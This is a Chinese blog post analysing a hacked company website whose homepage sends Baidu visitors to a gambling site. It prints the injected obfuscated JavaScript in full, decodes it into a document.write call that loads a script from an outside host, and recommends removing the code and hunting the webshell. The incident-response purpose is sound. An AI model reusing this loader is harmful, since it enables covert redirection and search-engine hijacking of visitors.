上午上q,剛登上去,老鐵跟我講被欺負瞭,網站從百度搜索進去,首頁發生跳轉到菠菜(博彩)網,開發公司的說可能是百度的問題,不是我們的問題,這種判斷能力我隻能說智商堪憂,又是xxxxx的網站開發公司。 直接進入正題,直接site:www.zyisolar.com打開首頁發生瞭跳轉,到https://www.365da8s.com/zh-cn/這個菠菜,其他頁面沒有,劫持代碼隻放在首頁,我們直接看代碼如果是無法直接從首頁查看源碼的情況,那麼在瀏覽器輸入view-source:域名 就可以查看網頁源碼隻需要看頭部代碼好熟悉,黑帽seo這行技術這幾年也沒什麼創新,刪除這兩行就可以解決基本問題<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”中億光伏-品牌光伏集成商”}</script><script type=”text/javascript”>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p;}(‘l[“\\e\\c\\1\\n\\f\\8\\o\\0”][“\\7\\3\\9\\0\\8”](\’\\g\\2\\1\\3\\9\\4\\0 \\0\\m\\4\\8\\d\\6\\0\\8\\j\\0\\5\\h\\a\\k\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\t\\0\\0\\4\\2\\u\\5\\5\\7\\7\\7\\b\\v\\1\\e\\a\\2\\q\\b\\1\\c\\f\\5\\r\\p\\s\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\’);’,32,32,’x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x78|x76|window|x79|x75|x6e|x36|x38|x33|x35|x68|x3a|x62′.split(‘|’),0,{}))</script>Keywords和description進行Unicode解碼,結果:bet365官方平臺開戶,bet365官方備用網址,bet365官方網站是多少,bet365官方亞洲版,bet365.com官方網站,bet365官方投註,bet365官方網站,bet365官方中文版,bet365中文官方網站,英國bet365官方網,bet365官方投註網站,bet365官方投註網址,bet365官方網投,bet365官方備用,bet365官方網站是多 <script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”中億光伏-品牌光伏集成商”}</script>這段意思就是判斷百度搜索訪問用戶進行跳轉,你去360,搜狗搜索訪問肯定是不會發生跳轉的 然後我們再來解最後一段代碼先進行js解壓,得出結果javascript代碼方式解密 1:\x64\x6f\x63\x75\x6d\x65\x6e\x74 結果 document2:\x77\x72\x69\x74\x65 結果 write3:\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x63\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x33\x36\x35\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e 結果 <script type=”text/javascript” src=”https://www.bcdas8.com/365.js”></script>整段的解密結果就是:<script type=”text/javascript”> window[“document”][“write”] (‘<script type=”text/javascript” src=”https://www.bcdas8.com/365.js”></script>’); </script>到瞭這裡整個過程已經很清晰瞭,雖然我們刪除瞭這段代碼但隻能暫時解決問題,需要找出webshell,做一個全面的網站和服務器安全策略,這種批量GetShell的基本上都是通過目前已經開放的漏洞,所以相對還是比較容易處理大多數人對網站的理解還停留在視覺層面,網絡安全的重要性反而被忽視,曾經我也主攻過滲透攻防,以打擊菠菜(博彩)和成人色情,傳銷等網站服務器為樂,我涉及這塊技術的目的不是為瞭幹點什麼,而是為瞭解決問題。任何公司需要提高對網絡安全的重視,找網絡開發公司也要避免入坑